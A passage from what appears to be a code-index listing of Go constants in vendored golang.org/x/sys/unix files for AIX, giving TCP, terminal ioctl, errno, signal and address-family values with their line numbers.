TCP_24DAYS_WORTH_OF_SLOWTICKS (line 890) | TCP_24DAYS_WORTH_OF_SLOWTICKS = 0x3f4800 constant TCP_ACLADD (line 891) | TCP_ACLADD = 0x23 constant TCP_ACLBIND (line 892) | TCP_ACLBIND = 0x26 constant TCP_ACLCLEAR (line 893) | TCP_ACLCLEAR = 0x22 constant TCP_ACLDEL (line 894) | TCP_ACLDEL = 0x24 constant TCP_ACLDENY (line 895) | TCP_ACLDENY = 0x8 constant TCP_ACLFLUSH (line 896) | TCP_ACLFLUSH = 0x21 constant TCP_ACLGID (line 897) | TCP_ACLGID = 0x1 constant TCP_ACLLS (line 898) | TCP_ACLLS = 0x25 constant TCP_ACLSUBNET (line 899) | TCP_ACLSUBNET = 0x4 constant TCP_ACLUID (line 900) | TCP_ACLUID = 0x2 constant TCP_CWND_DF (line 901) | TCP_CWND_DF = 0x16 constant TCP_CWND_IF (line 902) | TCP_CWND_IF = 0x15 constant TCP_DELAY_ACK_FIN (line 903) | TCP_DELAY_ACK_FIN = 0x2 constant TCP_DELAY_ACK_SYN (line 904) | TCP_DELAY_ACK_SYN = 0x1 constant TCP_FASTNAME (line 905) | TCP_FASTNAME = 0x101080a constant TCP_KEEPCNT (line 906) | TCP_KEEPCNT = 0x13 constant TCP_KEEPIDLE (line 907) | TCP_KEEPIDLE = 0x11 constant TCP_KEEPINTVL (line 908) | TCP_KEEPINTVL = 0x12 constant TCP_LSPRIV (line 909) | TCP_LSPRIV = 0x29 constant TCP_LUID (line 910) | TCP_LUID = 0x20 constant TCP_MAXBURST (line 911) | TCP_MAXBURST = 0x8 constant TCP_MAXDF (line 912) | TCP_MAXDF = 0x64 constant TCP_MAXIF (line 913) | TCP_MAXIF = 0x64 constant TCP_MAXSEG (line 914) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 915) | TCP_MAXWIN = 0xffff constant TCP_MAXWINDOWSCALE (line 916) | TCP_MAXWINDOWSCALE = 0xe constant TCP_MAX_SACK (line 917) | TCP_MAX_SACK = 0x4 constant TCP_MSS (line 918) | TCP_MSS = 0x5b4 constant TCP_NODELAY (line 919) | TCP_NODELAY = 0x1 constant TCP_NODELAYACK (line 920) | TCP_NODELAYACK = 0x14 constant TCP_NOREDUCE_CWND_EXIT_FRXMT (line 921) | TCP_NOREDUCE_CWND_EXIT_FRXMT = 0x19 constant TCP_NOREDUCE_CWND_IN_FRXMT (line 922) | TCP_NOREDUCE_CWND_IN_FRXMT = 0x18 constant TCP_NOTENTER_SSTART (line 923) | TCP_NOTENTER_SSTART = 0x17 constant TCP_OPT (line 924) | TCP_OPT = 0x19 constant TCP_RFC1323 (line 925) | TCP_RFC1323 = 0x4 constant TCP_SETPRIV (line 926) | TCP_SETPRIV = 0x27 constant TCP_STDURG (line 927) | TCP_STDURG = 0x10 constant TCP_TIMESTAMP_OPTLEN (line 928) | TCP_TIMESTAMP_OPTLEN = 0xc constant TCP_UNSETPRIV (line 929) | TCP_UNSETPRIV = 0x28 constant TCSAFLUSH (line 930) | TCSAFLUSH = 0x2 constant TCSBRK (line 931) | TCSBRK = 0x5409 constant TCSETA (line 932) | TCSETA = 0x5406 constant TCSETAF (line 933) | TCSETAF = 0x5408 constant TCSETAW (line 934) | TCSETAW = 0x5407 constant TCSETS (line 935) | TCSETS = 0x5402 constant TCSETSF (line 936) | TCSETSF = 0x5404 constant TCSETSW (line 937) | TCSETSW = 0x5403 constant TCXONC (line 938) | TCXONC = 0x540b constant TIMER_ABSTIME (line 939) | TIMER_ABSTIME = 0x3e7 constant TIMER_MAX (line 940) | TIMER_MAX = 0x20 constant TIOC (line 941) | TIOC = 0x5400 constant TIOCCBRK (line 942) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 943) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 944) | TIOCCONS = 0x80047462 constant TIOCEXCL (line 945) | TIOCEXCL = 0x2000740d constant TIOCFLUSH (line 946) | TIOCFLUSH = 0x80047410 constant TIOCGETC (line 947) | TIOCGETC = 0x40067412 constant TIOCGETD (line 948) | TIOCGETD = 0x40047400 constant TIOCGETP (line 949) | TIOCGETP = 0x40067408 constant TIOCGLTC (line 950) | TIOCGLTC = 0x40067474 constant TIOCGPGRP (line 951) | TIOCGPGRP = 0x40047477 constant TIOCGSID (line 952) | TIOCGSID = 0x40047448 constant TIOCGSIZE (line 953) | TIOCGSIZE = 0x40087468 constant TIOCGWINSZ (line 954) | TIOCGWINSZ = 0x40087468 constant TIOCHPCL (line 955) | TIOCHPCL = 0x20007402 constant TIOCLBIC (line 956) | TIOCLBIC = 0x8004747e constant TIOCLBIS (line 957) | TIOCLBIS = 0x8004747f constant TIOCLGET (line 958) | TIOCLGET = 0x4004747c constant TIOCLSET (line 959) | TIOCLSET = 0x8004747d constant TIOCMBIC (line 960) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 961) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 962) | TIOCMGET = 0x4004746a constant TIOCMIWAIT (line 963) | TIOCMIWAIT = 0x80047464 constant TIOCMODG (line 964) | TIOCMODG = 0x40047403 constant TIOCMODS (line 965) | TIOCMODS = 0x80047404 constant TIOCMSET (line 966) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 967) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 968) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 969) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 970) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 971) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 972) | TIOCM_LE = 0x1 constant TIOCM_RI (line 973) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 974) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 975) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 976) | TIOCM_SR = 0x10 constant TIOCM_ST (line 977) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 978) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 979) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 980) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 981) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 982) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 983) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 984) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 985) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_NOSTOP (line 986) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 987) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 988) | TIOCPKT_STOP = 0x4 constant TIOCREMOTE (line 989) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 990) | TIOCSBRK = 0x2000747b constant TIOCSDTR (line 991) | TIOCSDTR = 0x20007479 constant TIOCSETC (line 992) | TIOCSETC = 0x80067411 constant TIOCSETD (line 993) | TIOCSETD = 0x80047401 constant TIOCSETN (line 994) | TIOCSETN = 0x8006740a constant TIOCSETP (line 995) | TIOCSETP = 0x80067409 constant TIOCSLTC (line 996) | TIOCSLTC = 0x80067475 constant TIOCSPGRP (line 997) | TIOCSPGRP = 0x80047476 constant TIOCSSIZE (line 998) | TIOCSSIZE = 0x80087467 constant TIOCSTART (line 999) | TIOCSTART = 0x2000746e constant TIOCSTI (line 1000) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1001) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1002) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1003) | TIOCUCNTL = 0x80047466 constant TOSTOP (line 1004) | TOSTOP = 0x10000 constant UTIME_NOW (line 1005) | UTIME_NOW = -0x2 constant UTIME_OMIT (line 1006) | UTIME_OMIT = -0x3 constant VDISCRD (line 1007) | VDISCRD = 0xc constant VDSUSP (line 1008) | VDSUSP = 0xa constant VEOF (line 1009) | VEOF = 0x4 constant VEOL (line 1010) | VEOL = 0x5 constant VEOL2 (line 1011) | VEOL2 = 0x6 constant VERASE (line 1012) | VERASE = 0x2 constant VINTR (line 1013) | VINTR = 0x0 constant VKILL (line 1014) | VKILL = 0x3 constant VLNEXT (line 1015) | VLNEXT = 0xe constant VMIN (line 1016) | VMIN = 0x4 constant VQUIT (line 1017) | VQUIT = 0x1 constant VREPRINT (line 1018) | VREPRINT = 0xb constant VSTART (line 1019) | VSTART = 0x7 constant VSTOP (line 1020) | VSTOP = 0x8 constant VSTRT (line 1021) | VSTRT = 0x7 constant VSUSP (line 1022) | VSUSP = 0x9 constant VT0 (line 1023) | VT0 = 0x0 constant VT1 (line 1024) | VT1 = 0x8000 constant VTDELAY (line 1025) | VTDELAY = 0x2000 constant VTDLY (line 1026) | VTDLY = 0x8000 constant VTIME (line 1027) | VTIME = 0x5 constant VWERSE (line 1028) | VWERSE = 0xd constant WPARSTART (line 1029) | WPARSTART = 0x1 constant WPARSTOP (line 1030) | WPARSTOP = 0x2 constant WPARTTYNAME (line 1031) | WPARTTYNAME = "Global" constant XCASE (line 1032) | XCASE = 0x4 constant XTABS (line 1033) | XTABS = 0xc00 constant _FDATAFLUSH (line 1034) | _FDATAFLUSH = 0x2000000000 constant E2BIG (line 1039) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1040) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1041) | EADDRINUSE = syscall.Errno(0x43) constant EADDRNOTAVAIL (line 1042) | EADDRNOTAVAIL = syscall.Errno(0x44) constant EAFNOSUPPORT (line 1043) | EAFNOSUPPORT = syscall.Errno(0x42) constant EAGAIN (line 1044) | EAGAIN = syscall.Errno(0xb) constant EALREADY (line 1045) | EALREADY = syscall.Errno(0x38) constant EBADF (line 1046) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1047) | EBADMSG = syscall.Errno(0x78) constant EBUSY (line 1048) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1049) | ECANCELED = syscall.Errno(0x75) constant ECHILD (line 1050) | ECHILD = syscall.Errno(0xa) constant ECHRNG (line 1051) | ECHRNG = syscall.Errno(0x25) constant ECLONEME (line 1052) | ECLONEME = syscall.Errno(0x52) constant ECONNABORTED (line 1053) | ECONNABORTED = syscall.Errno(0x48) constant ECONNREFUSED (line 1054) | ECONNREFUSED = syscall.Errno(0x4f) constant ECONNRESET (line 1055) | ECONNRESET = syscall.Errno(0x49) constant ECORRUPT (line 1056) | ECORRUPT = syscall.Errno(0x59) constant EDEADLK (line 1057) | EDEADLK = syscall.Errno(0x2d) constant EDESTADDREQ (line 1058) | EDESTADDREQ = syscall.Errno(0x3a) constant EDESTADDRREQ (line 1059) | EDESTADDRREQ = syscall.Errno(0x3a) constant EDIST (line 1060) | EDIST = syscall.Errno(0x35) constant EDOM (line 1061) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1062) | EDQUOT = syscall.Errno(0x58) constant EEXIST (line 1063) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1064) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1065) | EFBIG = syscall.Errno(0x1b) constant EFORMAT (line 1066) | EFORMAT = syscall.Errno(0x30) constant EHOSTDOWN (line 1067) | EHOSTDOWN = syscall.Errno(0x50) constant EHOSTUNREACH (line 1068) | EHOSTUNREACH = syscall.Errno(0x51) constant EIDRM (line 1069) | EIDRM = syscall.Errno(0x24) constant EILSEQ (line 1070) | EILSEQ = syscall.Errno(0x74) constant EINPROGRESS (line 1071) | EINPROGRESS = syscall.Errno(0x37) constant EINTR (line 1072) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1073) | EINVAL = syscall.Errno(0x16) constant EIO (line 1074) | EIO = syscall.Errno(0x5) constant EISCONN (line 1075) | EISCONN = syscall.Errno(0x4b) constant EISDIR (line 1076) | EISDIR = syscall.Errno(0x15) constant EL2HLT (line 1077) | EL2HLT = syscall.Errno(0x2c) constant EL2NSYNC (line 1078) | EL2NSYNC = syscall.Errno(0x26) constant EL3HLT (line 1079) | EL3HLT = syscall.Errno(0x27) constant EL3RST (line 1080) | EL3RST = syscall.Errno(0x28) constant ELNRNG (line 1081) | ELNRNG = syscall.Errno(0x29) constant ELOOP (line 1082) | ELOOP = syscall.Errno(0x55) constant EMEDIA (line 1083) | EMEDIA = syscall.Errno(0x6e) constant EMFILE (line 1084) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1085) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1086) | EMSGSIZE = syscall.Errno(0x3b) constant EMULTIHOP (line 1087) | EMULTIHOP = syscall.Errno(0x7d) constant ENAMETOOLONG (line 1088) | ENAMETOOLONG = syscall.Errno(0x56) constant ENETDOWN (line 1089) | ENETDOWN = syscall.Errno(0x45) constant ENETRESET (line 1090) | ENETRESET = syscall.Errno(0x47) constant ENETUNREACH (line 1091) | ENETUNREACH = syscall.Errno(0x46) constant ENFILE (line 1092) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1093) | ENOATTR = syscall.Errno(0x70) constant ENOBUFS (line 1094) | ENOBUFS = syscall.Errno(0x4a) constant ENOCONNECT (line 1095) | ENOCONNECT = syscall.Errno(0x32) constant ENOCSI (line 1096) | ENOCSI = syscall.Errno(0x2b) constant ENODATA (line 1097) | ENODATA = syscall.Errno(0x7a) constant ENODEV (line 1098) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1099) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1100) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1101) | ENOLCK = syscall.Errno(0x31) constant ENOLINK (line 1102) | ENOLINK = syscall.Errno(0x7e) constant ENOMEM (line 1103) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1104) | ENOMSG = syscall.Errno(0x23) constant ENOPROTOOPT (line 1105) | ENOPROTOOPT = syscall.Errno(0x3d) constant ENOSPC (line 1106) | ENOSPC = syscall.Errno(0x1c) constant ENOSR (line 1107) | ENOSR = syscall.Errno(0x76) constant ENOSTR (line 1108) | ENOSTR = syscall.Errno(0x7b) constant ENOSYS (line 1109) | ENOSYS = syscall.Errno(0x6d) constant ENOTBLK (line 1110) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1111) | ENOTCONN = syscall.Errno(0x4c) constant ENOTDIR (line 1112) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1113) | ENOTEMPTY = syscall.Errno(0x11) constant ENOTREADY (line 1114) | ENOTREADY = syscall.Errno(0x2e) constant ENOTRECOVERABLE (line 1115) | ENOTRECOVERABLE = syscall.Errno(0x5e) constant ENOTRUST (line 1116) | ENOTRUST = syscall.Errno(0x72) constant ENOTSOCK (line 1117) | ENOTSOCK = syscall.Errno(0x39) constant ENOTSUP (line 1118) | ENOTSUP = syscall.Errno(0x7c) constant ENOTTY (line 1119) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1120) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1121) | EOPNOTSUPP = syscall.Errno(0x40) constant EOVERFLOW (line 1122) | EOVERFLOW = syscall.Errno(0x7f) constant EOWNERDEAD (line 1123) | EOWNERDEAD = syscall.Errno(0x5f) constant EPERM (line 1124) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1125) | EPFNOSUPPORT = syscall.Errno(0x41) constant EPIPE (line 1126) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1127) | EPROCLIM = syscall.Errno(0x53) constant EPROTO (line 1128) | EPROTO = syscall.Errno(0x79) constant EPROTONOSUPPORT (line 1129) | EPROTONOSUPPORT = syscall.Errno(0x3e) constant EPROTOTYPE (line 1130) | EPROTOTYPE = syscall.Errno(0x3c) constant ERANGE (line 1131) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1132) | EREMOTE = syscall.Errno(0x5d) constant ERESTART (line 1133) | ERESTART = syscall.Errno(0x52) constant EROFS (line 1134) | EROFS = syscall.Errno(0x1e) constant ESAD (line 1135) | ESAD = syscall.Errno(0x71) constant ESHUTDOWN (line 1136) | ESHUTDOWN = syscall.Errno(0x4d) constant ESOCKTNOSUPPORT (line 1137) | ESOCKTNOSUPPORT = syscall.Errno(0x3f) constant ESOFT (line 1138) | ESOFT = syscall.Errno(0x6f) constant ESPIPE (line 1139) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1140) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1141) | ESTALE = syscall.Errno(0x34) constant ESYSERROR (line 1142) | ESYSERROR = syscall.Errno(0x5a) constant ETIME (line 1143) | ETIME = syscall.Errno(0x77) constant ETIMEDOUT (line 1144) | ETIMEDOUT = syscall.Errno(0x4e) constant ETOOMANYREFS (line 1145) | ETOOMANYREFS = syscall.Errno(0x73) constant ETXTBSY (line 1146) | ETXTBSY = syscall.Errno(0x1a) constant EUNATCH (line 1147) | EUNATCH = syscall.Errno(0x2a) constant EUSERS (line 1148) | EUSERS = syscall.Errno(0x54) constant EWOULDBLOCK (line 1149) | EWOULDBLOCK = syscall.Errno(0xb) constant EWRPROTECT (line 1150) | EWRPROTECT = syscall.Errno(0x2f) constant EXDEV (line 1151) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1156) | SIGABRT = syscall.Signal(0x6) constant SIGAIO (line 1157) | SIGAIO = syscall.Signal(0x17) constant SIGALRM (line 1158) | SIGALRM = syscall.Signal(0xe) constant SIGALRM1 (line 1159) | SIGALRM1 = syscall.Signal(0x26) constant SIGBUS (line 1160) | SIGBUS = syscall.Signal(0xa) constant SIGCAPI (line 1161) | SIGCAPI = syscall.Signal(0x31) constant SIGCHLD (line 1162) | SIGCHLD = syscall.Signal(0x14) constant SIGCLD (line 1163) | SIGCLD = syscall.Signal(0x14) constant SIGCONT (line 1164) | SIGCONT = syscall.Signal(0x13) constant SIGCPUFAIL (line 1165) | SIGCPUFAIL = syscall.Signal(0x3b) constant SIGDANGER (line 1166) | SIGDANGER = syscall.Signal(0x21) constant SIGEMT (line 1167) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1168) | SIGFPE = syscall.Signal(0x8) constant SIGGRANT (line 1169) | SIGGRANT = syscall.Signal(0x3c) constant SIGHUP (line 1170) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1171) | SIGILL = syscall.Signal(0x4) constant SIGINT (line 1172) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1173) | SIGIO = syscall.Signal(0x17) constant SIGIOINT (line 1174) | SIGIOINT = syscall.Signal(0x10) constant SIGIOT (line 1175) | SIGIOT = syscall.Signal(0x6) constant SIGKAP (line 1176) | SIGKAP = syscall.Signal(0x3c) constant SIGKILL (line 1177) | SIGKILL = syscall.Signal(0x9) constant SIGLOST (line 1178) | SIGLOST = syscall.Signal(0x6) constant SIGMAX (line 1179) | SIGMAX = syscall.Signal(0x3f) constant SIGMAX32 (line 1180) | SIGMAX32 = syscall.Signal(0x3f) constant SIGMIGRATE (line 1181) | SIGMIGRATE = syscall.Signal(0x23) constant SIGMSG (line 1182) | SIGMSG = syscall.Signal(0x1b) constant SIGPIPE (line 1183) | SIGPIPE = syscall.Signal(0xd) constant SIGPOLL (line 1184) | SIGPOLL = syscall.Signal(0x17) constant SIGPRE (line 1185) | SIGPRE = syscall.Signal(0x24) constant SIGPROF (line 1186) | SIGPROF = syscall.Signal(0x20) constant SIGPTY (line 1187) | SIGPTY = syscall.Signal(0x17) constant SIGPWR (line 1188) | SIGPWR = syscall.Signal(0x1d) constant SIGQUIT (line 1189) | SIGQUIT = syscall.Signal(0x3) constant SIGRECONFIG (line 1190) | SIGRECONFIG = syscall.Signal(0x3a) constant SIGRETRACT (line 1191) | SIGRETRACT = syscall.Signal(0x3d) constant SIGSAK (line 1192) | SIGSAK = syscall.Signal(0x3f) constant SIGSEGV (line 1193) | SIGSEGV = syscall.Signal(0xb) constant SIGSOUND (line 1194) | SIGSOUND = syscall.Signal(0x3e) constant SIGSTOP (line 1195) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1196) | SIGSYS = syscall.Signal(0xc) constant SIGSYSERROR (line 1197) | SIGSYSERROR = syscall.Signal(0x30) constant SIGTALRM (line 1198) | SIGTALRM = syscall.Signal(0x26) constant SIGTERM (line 1199) | SIGTERM = syscall.Signal(0xf) constant SIGTRAP (line 1200) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1201) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1202) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1203) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1204) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1205) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1206) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVIRT (line 1207) | SIGVIRT = syscall.Signal(0x25) constant SIGVTALRM (line 1208) | SIGVTALRM = syscall.Signal(0x22) constant SIGWAITING (line 1209) | SIGWAITING = syscall.Signal(0x27) constant SIGWINCH (line 1210) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1211) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1212) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_aix_ppc64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_BYPASS (line 15) | AF_BYPASS = 0x19 constant AF_CCITT (line 16) | AF_CCITT = 0xa constant AF_CHAOS (line 17) | AF_CHAOS = 0x5 constant AF_DATAKIT (line 18) | AF_DATAKIT = 0x9 constant AF_DECnet (line 19) | AF_DECnet = 0xc constant AF_DLI (line 20) | AF_DLI = 0xd constant AF_ECMA (line 21) | AF_ECMA = 0x8 constant AF_HYLINK (line 22) | AF_HYLINK = 0xf constant AF_IMPLINK (line 23) | AF_IMPLINK = 0x3 constant AF_INET (line 24) | AF_INET = 0x2 constant AF_INET6 (line 25) | AF_INET6 = 0x18 constant AF_INTF (line 26) | AF_INTF = 0x14 constant AF_ISO (line 27) | AF_ISO = 0x7 constant AF_LAT (line 28) | AF_LAT = 0xe constant AF_LINK (line 29) | AF_LINK = 0x12 constant AF_LOCAL (line 30) | AF_LOCAL = 0x1 constant AF_MAX (line 31) | AF_MAX = 0x1e constant AF_NDD (line 32) | AF_NDD = 0x17 constant AF_NETWARE (line 33) | AF_NETWARE = 0x16 constant AF_NS (line 34) | AF_NS = 0x6 constant AF_OSI (line 35) | AF_OSI = 0x7 constant AF_PUP (line 36) | AF_PUP = 0x4 constant AF_RIF (line 37) | AF_RIF = 0x15 constant AF_ROUTE (line 38) | AF_ROUTE = 0x11 constant AF_SNA (line 39) | AF_SNA = 0xb constant AF_UNIX (line 40) | AF_UNIX = 0x1 constant AF_UNSPEC (line 41) | AF_UNSPEC = 0x0 constant ALTWERASE (line 42) | ALTWERASE = 0x400000 constant ARPHRD_802_3 (line 43) | ARPHRD_802_3 = 0x6 constant ARPHRD_802_5 (line 44) | ARPHRD_802_5 = 0x6 constant ARPHRD_ETHER (line 45) | ARPHRD_ETHER = 0x1 constant ARPHRD_FDDI (line 46) | ARPHRD_FDDI = 0x1 constant B0 (line 47) | B0 = 0x0 constant B110 (line 48) | B110 = 0x3 constant B1200 (line 49) | B1200 = 0x9 constant B134 (line 50) | B134 = 0x4 constant B150 (line 51) | B150 = 0x5 constant B1800 (line 52) | B1800 = 0xa constant B19200 (line 53) | B19200 = 0xe constant B200 (line 54) | B200 = 0x6 constant B2400 (line 55) | B2400 = 0xb constant B300 (line 56) | B300 = 0x7 constant B38400 (line 57) | B38400 = 0xf constant B4800 (line 58) | B4800 = 0xc constant B50 (line 59) | B50 = 0x1 constant B600 (line 60) | B600 = 0x8 constant B75 (line 61) | B75 = 0x2 constant B9600 (line 62) | B9600 = 0xd constant BRKINT (line 63) | BRKINT = 0x2 constant BS0 (line 64) | BS0 = 0x0 constant BS1 (line 65) | BS1 = 0x1000 constant BSDLY (line 66) | BSDLY = 0x1000 constant CAP_AACCT (line 67) | CAP_AACCT = 0x6 constant CAP_ARM_APPLICATION (line 68) | CAP_ARM_APPLICATION = 0x5 constant CAP_BYPASS_RAC_VMM (line 69) | CAP_BYPASS_RAC_VMM = 0x3 constant CAP_CLEAR (line 70) | CAP_CLEAR = 0x0 constant CAP_CREDENTIALS (line 71) | CAP_CREDENTIALS = 0x7 constant CAP_EFFECTIVE (line 72) | CAP_EFFECTIVE = 0x1 constant CAP_EWLM_AGENT (line 73) | CAP_EWLM_AGENT = 0x4 constant CAP_INHERITABLE (line 74) | CAP_INHERITABLE = 0x2 constant CAP_MAXIMUM (line 75) | CAP_MAXIMUM = 0x7 constant CAP_NUMA_ATTACH (line 76) | CAP_NUMA_ATTACH = 0x2 constant CAP_PERMITTED (line 77) | CAP_PERMITTED = 0x3 constant CAP_PROPAGATE (line 78) | CAP_PROPAGATE = 0x1 constant CAP_PROPOGATE (line 79) | CAP_PROPOGATE = 0x1 constant CAP_SET (line 80) | CAP_SET = 0x1 constant CBAUD (line 81) | CBAUD = 0xf constant CFLUSH (line 82) | CFLUSH = 0xf constant CIBAUD (line 83) | CIBAUD = 0xf0000 constant CLOCAL (line 84) | CLOCAL = 0x800 constant CLOCK_MONOTONIC (line 85) | CLOCK_MONOTONIC = 0xa constant CLOCK_PROCESS_CPUTIME_ID (line 86) | CLOCK_PROCESS_CPUTIME_ID = 0xb constant CLOCK_REALTIME (line 87) | CLOCK_REALTIME = 0x9 constant CLOCK_THREAD_CPUTIME_ID (line 88) | CLOCK_THREAD_CPUTIME_ID = 0xc constant CR0 (line 89) | CR0 = 0x0 constant CR1 (line 90) | CR1 = 0x100 constant CR2 (line 91) | CR2 = 0x200 constant CR3 (line 92) | CR3 = 0x300 constant CRDLY (line 93) | CRDLY = 0x300 constant CREAD (line 94) | CREAD = 0x80 constant CS5 (line 95) | CS5 = 0x0 constant CS6 (line 96) | CS6 = 0x10 constant CS7 (line 97) | CS7 = 0x20 constant CS8 (line 98) | CS8 = 0x30 constant CSIOCGIFCONF (line 99) | CSIOCGIFCONF = -0x3fef96dc constant CSIZE (line 100) | CSIZE = 0x30 constant CSMAP_DIR (line 101) | CSMAP_DIR = "/usr/lib/nls/csmap/" constant CSTART (line 102) | CSTART = '\021' constant CSTOP (line 103) | CSTOP = '\023' constant CSTOPB (line 104) | CSTOPB = 0x40 constant CSUSP (line 105) | CSUSP = 0x1a constant ECHO (line 106) | ECHO = 0x8 constant ECHOCTL (line 107) | ECHOCTL = 0x20000 constant ECHOE (line 108) | ECHOE = 0x10 constant ECHOK (line 109) | ECHOK = 0x20 constant ECHOKE (line 110) | ECHOKE = 0x80000 constant ECHONL (line 111) | ECHONL = 0x40 constant ECHOPRT (line 112) | ECHOPRT = 0x40000 constant ECH_ICMPID (line 113) | ECH_ICMPID = 0x2 constant ETHERNET_CSMACD (line 114) | ETHERNET_CSMACD = 0x6 constant EVENP (line 115) | EVENP = 0x80 constant EXCONTINUE (line 116) | EXCONTINUE = 0x0 constant EXDLOK (line 117) | EXDLOK = 0x3 constant EXIO (line 118) | EXIO = 0x2 constant EXPGIO (line 119) | EXPGIO = 0x0 constant EXRESUME (line 120) | EXRESUME = 0x2 constant EXRETURN (line 121) | EXRETURN = 0x1 constant EXSIG (line 122) | EXSIG = 0x4 constant EXTA (line 123) | EXTA = 0xe constant EXTB (line 124) | EXTB = 0xf constant EXTRAP (line 125) | EXTRAP = 0x1 constant EYEC_RTENTRYA (line 126) | EYEC_RTENTRYA = 0x257274656e747241 constant EYEC_RTENTRYF (line 127) | EYEC_RTENTRYF = 0x257274656e747246 constant E_ACC (line 128) | E_ACC = 0x0 constant FD_CLOEXEC (line 129) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 130) | FD_SETSIZE = 0xfffe constant FF0 (line 131) | FF0 = 0x0 constant FF1 (line 132) | FF1 = 0x2000 constant FFDLY (line 133) | FFDLY = 0x2000 constant FLUSHBAND (line 134) | FLUSHBAND = 0x40 constant FLUSHLOW (line 135) | FLUSHLOW = 0x8 constant FLUSHO (line 136) | FLUSHO = 0x100000 constant FLUSHR (line 137) | FLUSHR = 0x1 constant FLUSHRW (line 138) | FLUSHRW = 0x3 constant FLUSHW (line 139) | FLUSHW = 0x2 constant F_CLOSEM (line 140) | F_CLOSEM = 0xa constant F_DUP2FD (line 141) | F_DUP2FD = 0xe constant F_DUPFD (line 142) | F_DUPFD = 0x0 constant F_GETFD (line 143) | F_GETFD = 0x1 constant F_GETFL (line 144) | F_GETFL = 0x3 constant F_GETLK (line 145) | F_GETLK = 0xb constant F_GETLK64 (line 146) | F_GETLK64 = 0xb constant F_GETOWN (line 147) | F_GETOWN = 0x8 constant F_LOCK (line 148) | F_LOCK = 0x1 constant F_OK (line 149) | F_OK = 0x0 constant F_RDLCK (line 150) | F_RDLCK = 0x1 constant F_SETFD (line 151) | F_SETFD = 0x2 constant F_SETFL (line 152) | F_SETFL = 0x4 constant F_SETLK (line 153) | F_SETLK = 0xc constant F_SETLK64 (line 154) | F_SETLK64 = 0xc constant F_SETLKW (line 155) | F_SETLKW = 0xd constant F_SETLKW64 (line 156) | F_SETLKW64 = 0xd constant F_SETOWN (line 157) | F_SETOWN = 0x9 constant F_TEST (line 158) | F_TEST = 0x3 constant F_TLOCK (line 159) | F_TLOCK = 0x2 constant F_TSTLK (line 160) | F_TSTLK = 0xf constant F_ULOCK (line 161) | F_ULOCK = 0x0 constant F_UNLCK (line 162) | F_UNLCK = 0x3 constant F_WRLCK (line 163) | F_WRLCK = 0x2 constant HUPCL (line 164) | HUPCL = 0x400 constant IBSHIFT (line 165) | 